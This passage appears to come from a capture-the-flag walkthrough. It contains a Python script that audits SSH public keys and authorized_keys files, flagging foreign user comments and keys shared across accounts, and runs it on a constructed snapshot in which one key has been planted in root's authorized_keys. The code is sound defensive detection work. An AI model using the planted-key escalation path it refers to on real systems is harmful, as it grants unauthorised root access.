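# options such as command="..." before the key type, so search() is used, not match().
KEY_RE = re.compile(
    r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d{3}|sk-[\w@.-]+)\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$"
)

# Constructed stand-in for the nadav@passage key shown above (not the real blob).
NADAV_PUB = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0NSTRUCTEDKEYBLOB nadav@passage"

# Constructed snapshot of what the box looked like after the steps above.
SAMPLE_KEY_FILES = {
    "paul": {"/home/paul/.ssh/id_rsa.pub": NADAV_PUB + "\n"},
    "nadav": {"/home/nadav/.ssh/authorized_keys": NADAV_PUB + "\n"},
    "root": {"/root/.ssh/authorized_keys": "# written via USBCreator.Image\n" + NADAV_PUB + "\n"},
}


def parse_key_line(line):
    """Return (key_type, blob, comment) for one key line, or None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = KEY_RE.search(line)
    if not m:
        return None
    return m.group(1), m.group(2), (m.group(3) or "").strip()


def audit_ssh_keys(key_files):
    """key_files: {account: {path: text}} for every .pub and authorized_keys file found.

    Returns a list of (finding, account, path, detail) tuples.
    """
    findings = []
    owners = defaultdict(set)  # key blob -> accounts whose files contain it
    for account, files in sorted(key_files.items()):
        for path, text in sorted(files.items()):
            for line in text.splitlines():
                parsed = parse_key_line(line)
                if parsed is None:
                    continue
                _ktype, blob, comment = parsed
                owners[blob].add(account)
                # Heuristic: the comment is free text, but user@host is ssh-keygen's
                # default, and a foreign username in it is what paul's id_rsa.pub showed.
                if "@" in comment and comment.split("@", 1)[0] != account:
                    findings.append(("foreign-key-comment", account, path, comment))
    # The solid check: the same public key trusted by, or stored for, several accounts.
    for blob, accounts in owners.items():
        if len(accounts) > 1:
            findings.append(("key-shared-across-accounts", ",".join(sorted(accounts)), "", blob[:16] + "..."))
    return findings


if __name__ == "__main__":
    for finding in audit_ssh_keys(SAMPLE_KEY_FILES):
        print(*finding)
```

On a real host the snapshot dict would be built by walking /root/.ssh and each /home/*/.ssh as root; a private key file (id_rsa) found under an account other than the one named in its matching .pub is the case the writeup exploits and deserves the highest priority in the report.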
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE